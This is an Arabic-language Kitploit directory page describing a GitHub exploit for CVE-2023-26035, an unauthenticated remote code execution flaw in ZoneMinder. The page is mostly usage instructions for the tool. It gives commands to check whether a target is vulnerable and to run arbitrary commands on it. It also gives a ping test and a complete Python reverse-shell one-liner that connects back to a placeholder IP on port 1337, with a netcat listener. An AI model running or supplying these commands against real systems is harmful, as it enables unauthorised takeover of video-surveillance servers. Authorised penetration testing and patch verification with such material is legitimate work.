Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
zoneminder_CVE-2023-26035 — استغلال لـ CVE-2023-26035 يؤثر على ZoneMinder < 1.36.33 و < 1.37.33 | Kitploit
أدوات/GitHubGitHub/0xfalafel/zoneminder_cve-2023-26035
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHub0xfalafel/zoneminder_cve-2023-26035

zoneminder_CVE-2023-26035

استغلال لـ CVE-2023-26035 يؤثر على ZoneMinder < 1.36.33 و < 1.37.33

عرض المستودع
1منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال - ZoneMinder CVE-2023-26035

يوجد تنفيذ تعليمات برمجية عن بعد غير مُصدق عليه (RCE) يؤثر على لقطات ZoneMinder.
هذا استغلال لـ CVE-2023-26035.

الإصدارات المتأثرة

ZoneMinder < 1.36.33 و
ZoneMinder < 1.37.33.

استخدام الاستغلال

الاستخدام

التحقق مما إذا كان الهدف ضعيفًا:

root@kitploit:~
python3 zoneminder.py http://target

تنفيذ أمر

root@kitploit:~
python3 zoneminder.py http://target command

أمثلة

اختبار تنفيذ الأمر باستخدام ping

قم بتشغيل tcpdump على الواجهة المتصلة بالهدف (هنا tun0) وقم بالتصفية لحزم ICMP:

root@kitploit:~
sudo tcpdump -i tun0 icmp

ثم قم بتنفيذ ping إلى عنوان IP الخاص بك. تأكد من استخدام علامات الاقتباس " وإلا فلن يتم تفسير الأمر بشكل صحيح.

root@kitploit:~
python3 zoneminder.py http://target "ping -C 4 your_ip"

شل عكسي

أنشئ المستمع باستخدام netcat:

root@kitploit:~
nc -lvnp 1337

استخدم سطر واحد للشل العكسي:

root@kitploit:~
python3 zoneminder.py http://TARGET "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",1337));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'"

المزيد على https://revshells.com.

المتطلبات

يستخدم الاستغلال requests و BeautifulSoup. قم بتثبيته باستخدام:

root@kitploit:~
python3 -m pip install requests beautifulsoup4

الإقرارات

أردت فقط استغلالًا مستقلاً لا يحتاج إلى Metasploit.
النص مشتق من https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/zoneminder_snapshots.rb

https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr

تنزيل الأداة